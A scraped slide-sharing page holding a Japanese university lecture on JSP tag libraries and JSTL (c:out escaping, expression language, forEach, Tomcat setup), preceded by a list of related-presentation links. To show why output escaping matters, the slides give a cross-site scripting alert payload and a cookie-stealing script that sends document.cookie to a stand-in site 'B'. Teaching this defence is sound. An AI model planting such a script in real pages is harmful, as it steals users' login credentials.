タグライブラリ ソフトウェア特論 第6回.

Slides:



Advertisements
Similar presentations
セッション管理 ソフトウェア特論 第 8 回. ここでの内容 セッション管理の基本を知る。 HttpSession の使い方を知る。
Advertisements

年度 J2EE II 稚内北星学園大学 情報メディア学部 専任講師 安藤 友晴. 2 この講義の位置づけ 3年前期の「データベース論 (J2EE I) 」に続く講義。 「データベース論」の講義内容を理解 していることが前提。
1 JSP の作成 JSF による Web アプリケーション 開発 第 4 回. 2 ここでの内容 JSF での JSP の作り方と動かし方につい て学ぶ。
1 なんとなく Ajax ~新しくて古い XMLHttp 川合孝典 (Kansai.pm) 2005/5/22.
TeX で数式を書くための PowerPoint アドイン Ver (2011/06/26) Ver. 0.1 (2007/5/30)
2004年度 サマースクール in 稚内 JSFによるWebアプリケーション開発
プログラムを「StiLL」で作成します。
PHPエディタによる 情報システム演習 01.
TeX で数式を書くための PowerPoint アドイン Ver. 0.1 (2007/5/30)
情報理工学部 情報システム工学科 ラシキアゼミ3年 H 岡田 貴大
Mavenによる プロジェクト管理 近畿大学理工学部 情報学科3年  小野実.
JSFによるWebアプリケーション開発 第11回
Servlet J2EE I 第8回 /
稚内北星学園大学 情報メディア学部 助教授 安藤 友晴
Vulnerability of Cross-Site Scripting
Webサービスマッシュアップを利用したWebアプリケーションの開発
オペレーティングシステムⅡ 第3回 講師 松本 章代 VirtuaWin・・・仮想デスクトップソフト 2009/10/16.
タグライブラリとJSP J2EE I 第10回 /
4-3.基本的なPHPスクリプト 2004年6月24日(木) 大北高広 01T6010F.
セッション管理 J2EE I 第9回 /
HTTPプロトコルとJSP (1) データベース論 第3回.
Webを利用した授業支援システムの開発 北海道工業大学 電気電子工学科 H 渋谷 俊彦.
タグライブラリとJSP J2EE II 第2回 2004年10月7日 (木).
JavaBeans とJSP データベース論 第5回.
JSFによるWebアプリケーション開発 第6回
HTTPプロトコル J2EE I 第7回 /
エンタープライズアプリケーション II 第7回 / 2006年7月9日
EBSCOhost 詳細検索 チュートリアル support.ebsco.com.
2005年10月6日 植田龍男 Webサービス II (第2回) 年10月6日 植田龍男.
JSPの作成 J2EE II 第3回 2005年4月10日.
ServletによるWebアプリ作成 入門
Javaによる Webアプリケーション入門 第9回
Javaによる Webアプリケーション入門 第5回
第8章 Web技術とセキュリティ   岡本 好未.
2004年度 サマースクール in 稚内 JavaによるWebアプリケーション入門
2003年度 データベース論 安藤 友晴.
ガジェット・マスターへの まわり道!? ~Ajaxを理解しよう~
Webアプリケーションの方向性 データベース論 第13回.
2006年度 東京サテライト校 エンタープライズ・アプリケーション II
インラインスクリプトに対するデータフロー 解析を用いた XHTML 文書の構文検証
Javaによる Webアプリケーション入門 第6回
Jakarta Struts (2) ソフトウェア特論 第11回.
Javaによる Webアプリケーション入門 第2回
JXTA Shell (1) P2P特論 (ソフトウェア特論) 第4回 /
Javaによる Webアプリケーション入門 第11回
Servlet ソフトウェア特論 第7回.
XML Schema (1) ソフトウェア特論 第3回 /
Servlet J2EE I (データベース論) 第12回 /
Servlet データベース論 第6回.
JSFによるWebアプリケーション開発 第3回
JDBC ソフトウェア特論 第3回.
情報基礎演習I(プログラミング) 第11回 7月12日 水曜5限 江草由佳
JavaScriptを含んだHTML文書に対する データフロー解析を用いた構文検証手法の提案
Webアプリケーションと JSPの基本 ソフトウェア特論 第4回.
TeX で数式を書くための PowerPoint アドイン Ver. 0.1 (2007/5/30)
Javaによる Webアプリケーション入門 第8回
地域生活支援システムの開発 越田研究室 j0431 野津洋二.
Javaによる Webアプリケーション入門 第4回
Webページに動きを持たせるJavascript言語について 例題のプログラムを通して体験的に理解することとします。
WebアプリケーションとTomcat ― これまでの復習とこれからの予習 ―
JSPの基本 データベース論 第2回.
Action Method の実装 J2EE II 第9回 2004年12月2日.
TeX で数式を書くための PowerPoint アドイン Ver. 0.1 (2007/5/30)
Jakarta Struts (1) ソフトウェア特論 第10回.
稚内北星学園大学 情報メディア学部 専任講師 安藤 友晴
JSPの基本 J2EE I (データベース論) 第8回 /
2008/7/16(情報コース)2008/7/22(通信コース) 住井
例題のプログラムを通して JavaScriptの仕組みを理解することとします。
JSFによるWebアプリケーション開発 第7回
MVCモデル2による Webアプリケーション
Presentation transcript:

タグライブラリ ソフトウェア特論 第6回

ここでの内容 タグライブラリの使い方、特にJSTLについて学ぶ。

タグライブラリ JSPの中で定義できる独自のタグ。 スクリプトレットを減らすことができる。 タグライブラリの構成 タグの処理を記述する Java のプログラム タグに関する情報を持つ Tag Library Descriptor (TLD)

さまざまなタグライブラリ 既製のタグライブラリもいくつかある。 JavaServer Pages Standard Tag Library (JSTL) 値の設定・制御構造 データベースへのアクセス、国際化、XMLの解析など Jakarta Taglibs Struts のタグライブラリ

タグのエンコード (1) フォームから入力した文字列を出力するサンプル c:out を使うと、“<” や “>” や “&” といった文字をエンコードする。 <p> c:out を使わない場合: <%= request.getParameter("title") %> </p> c:out を使った場合: <c:out value="${param.title}" />

タグのエンコード (2) 入力文字列 c:out を使った場合 c:out を使わない場合 <m>wakhok</m> c:out を使った場合 c:out を使わない場合 wakhok

クロスサイトスクリプティング (1) フォームから入力されたタグがそのまま出力される ↓ 入力された文字が JavaScript だった場合

<script>alert(“アホですか?”);</script> クロスサイトスクリプティング (2) 実例 <script>alert(“アホですか?”);</script> ↓ 警告画面が表示されてしまう

クロスサイトスクリプティング (3) cookie が盗まれる例 (1) ショッピングサイト “WAK” とその利用者が狙われる例 “WAK” の商品検索システムは、クロスサイトスクリプティングを引き起こしてしまうようになっている。 “WAK” では、商品を購入するときに使うユーザ名とパスワードを cookie に保存している。

クロスサイトスクリプティング (4) cookie が盗まれる例 (2) ここで、怪しいサイト“A”が登場する。 “A” には、“WAK” へのリンクが貼られている。 その内容は WAK の Cookie を取得して、その Cookie を別のサイト “B” の getCookie.jsp に渡す JavaScript

クロスサイトスクリプティング (5) cookie が盗まれる例 (3) リンクの内容 <a href=http://wak/search.jsp?p=(JavaScriptのタグ) Hなサイト </a>

クロスサイトスクリプティング (6) cookie が盗まれる例 (4) JavaScript の内容 <script> s = document.cookie; location.href = “http://B/getCookie.jsp?c=“+str; </script>

クロスサイトスクリプティング (7) cookie が盗まれる例 (5) “WAK” の利用者が サイト “A” へのリンクをうっかり押してしまった場合 リンク先の “WAK” のサイトが表示されるとき、同時に JavaScript を実行されて Cookie を盗まれる ユーザ名とパスワードを盗られたので、あとはやられ放題。

タグのエンコード (3) タグの入力を許可してしまうと、クロスサイトスクリプティングを引き起こすことが考えられる。 タグの入力を許可しない方がよい。 こうした処理をタグライブラリを使わずに書くには、スクリプトレットを使う必要がある。

タグライブラリを使う 利用するタグライブラリと、その接頭辞を指定 <%@ taglib prefix="c" uri="http://java.sun.com/jstl/core" %>

式言語 (Expression Language) ${var} 変数 var ${param.title} フォームから入力されたデータ "title" の値 ${book.author} book という Bean の author プロパティ

制御構造の例 <ul> <c:forEach var="book" items="${bookList.iterator}" > <li> <c:out value="${book.title}" /> / <c:out value="${book.author}" /> </li> </c:forEach> </ul>

Tomcat への配置 JSTL の配布パッケージの lib フォルダに含まれている次の4つのjarファイルを WEB-INF/lib フォルダにコピーする。 jstl.jar standard.jar jaxen-full.jar saxpath.jar